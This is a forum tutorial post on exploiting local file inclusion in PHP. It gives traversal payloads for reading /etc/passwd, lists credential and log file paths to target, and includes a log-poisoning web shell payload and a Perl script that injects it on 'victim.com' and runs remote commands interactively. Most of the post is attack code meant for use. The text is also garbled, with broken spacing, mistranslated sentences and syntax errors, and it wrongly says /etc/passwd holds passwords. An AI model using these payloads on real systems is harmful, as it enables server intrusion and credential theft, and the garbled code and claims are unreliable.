Jump to content
Aerosol

LFI vulnerability exploitation

By Aerosol, in Securitate web

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted

In this tutorial you'll learn how how to exploit a vulnerable LFI site.

First of all let's have a look at this small PHP code:

PHP Code : 

 < ? php
$ page = $ _GET [page ] ;
include ( $ page ) ;
? >

This is a code should not be never used again, because is vulnerable to LFI, the $page variable is not sanitized.

We take advantage of this vulnerability with this code :

 site.host / index.php page = . . / . . / . . / . . / . . / . . / . . / etc / passwd

If the site is hosted Unix users passwords are stored in / etc / passwd and the above code shows the passwords and usernames .

Now all you have to do is to decode the password.

An encrypted password should look like:

 username: x : 503:100 : fullname :/ home / username :/ bin / sh

In this example , the password is x , as another example of the password :

 username ! : 503:100 : fullname :/ home / username :/ bin / sh

Other " places " where you can find passwords out of / etc / passwd it's about :

 / etc / shadow
/ etc / group
/ etc / security / group
/ etc / security / passwd
/ etc / security / user
/ etc / security / environ
/ etc / security / limits

In case the browser will show a late inclusion . Php ( and automatically. / Etc / passwd.php not exist ) , add to sf including server will skip all write .

 site.host / index.php ? file = . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd

We try to run the commands in the log server injecting php code, then coiling them .

Some addresses log :

 . . / apache / logs / error.log
. . / apache / logs / access.log
. . / . . / apache / logs / error.log
. . / . . / apache / logs / access.log
. . / . . / . . / apache / logs / error.log
. . / . . / . . / apache / logs / access.log
. . / . . / . . / . . / . . / . . / . . / etc / httpd / logs / acces_log
. . / . . / . . / . . / . . / . . / . . / etc / httpd / logs / acces.log
. . / . . / . . / . . / . . / . . / . . / etc / httpd / logs / error_log
. . / . . / . . / . . / . . / . . / . . / etc / httpd / logs / error.log
. . / . . / . . / . . / . . / . . / . . / var / www / logs / access_log
. . / . . / . . / . . / . . / . . / . . / var / www / logs / access.log
. . / . . / . . / . . / . . / . . / . . / usr / local / apache / logs / access_log
. . / . . / . . / . . / . . / . . / . . / usr / local / apache / logs / access.log
. . / . . / . . / . . / . . / . . / . . / var / log / apache / access_log
../../../../../../../var/log/apache2/access_log
. . / . . / . . / . . / . . / . . / . . / var / log / apache / access.log
../../../../../../../var/log/apache2/access.log
. . / . . / . . / . . / . . / . . / . . / var / log / access_log
. . / . . / . . / . . / . . / . . / . . / var / log / access.log
. . / . . / . . / . . / . . / . . / . . / var / www / logs / error_log
. . / . . / . . / . . / . . / . . / . . / var / www / logs / error.log
. . / . . / . . / . . / . . / . . / . . / usr / local / apache / logs / error_log
. . / . . / . . / . . / . . / . . / . . / usr / local / apache / logs / error.log
. . / . . / . . / . . / . . / . . / . . / var / log / apache / error_log
../../../../../../../var/log/apache2/error_log
. . / . . / . . / . . / . . / . . / . . / var / log / apache / error.log
../../../../../../../var/log/apache2/error.log
. . / . . / . . / . . / . . / . . / . . / var / log / error_log
. . / . . / . . / . . / . . / . . / . . / var / log / error.log 

 site.host / index.php ? file = . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd

Ok , now let 's look at the log that saves pages that do not exist and the following code : < ? passthru ( \ $ _GET [ cmd ] ) ? > . If we write in the browser:

site.host / < ? passthru ( \ $ _GET [ cmd ] ) ? >

We'll obviously show a page that says that this code does not exist on the server, because the browser automatically encode the URL and the page that we have reached a browser translates to:

 site.host / < ? passthru ( \ $ _GET [ cmd ] ) ? >

So you have to do something else ... We use the following perl script :

 #! / usr / bin / perl -w
use IO :: Socket ;
use LWP :: UserAgent ;
$ site = " victim.com "
$ path = " / folder / " ;
$ code = "<? passthru ( \ $ _GET [ cmd ] ) ? > " ;
$ log = " . . / . . / . . / . . / . . / . . / . . / etc / httpd / logs / error_log " ;

print " Trying to inject the code" ;

$ socket = IO :: Socket :: INET - > new ( Proto = > " tcp " , PeerAddr = > " $ site " PeerPort = > "80" ) or die "\ nConnection Failed . \ n \ n";
print $ socket " GET " . $ path . $ code . " HTTP/1.1 \ r \ n";
print $ socket "User -Agent " . $ code . "\ r \ n";
print $ socket "Host : " . $ site . "\ r \ n";
print $ socket "Connection : close \ r \ n \ r \ n";
close ( $ socket) ;
print " \ nCode $ code sucssefully injected in $ log \ n";

print " \ nType command to run or exit to end: " ;
$ cmd = <STDIN> ;

while ($ cmd ! ~ "exit" ) {

$ socket = IO :: Socket :: INET - > new ( Proto = > " tcp " , PeerAddr = > " $ site " PeerPort = > "80" ) or die "\ nConnection Failed . \ n \ n";
****print $ socket " GET " . $ path . " index.php = ' . $ log . " & cmd = $ cmd HTTP/1.1 \ r \ n ";
****print $ socket "Host : " . $ site . "\ r \ n";
****print $ socket " Accept: * / * \ r \ n";
****print $ socket "Connection : close \ r \ n \ n";

****while ($ show = <$ socket > )
****{
********print $ show ;
****}

print " Type command to run or exit to end: " ;
$ cmd = <STDIN> ;
}

Source: madleets

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...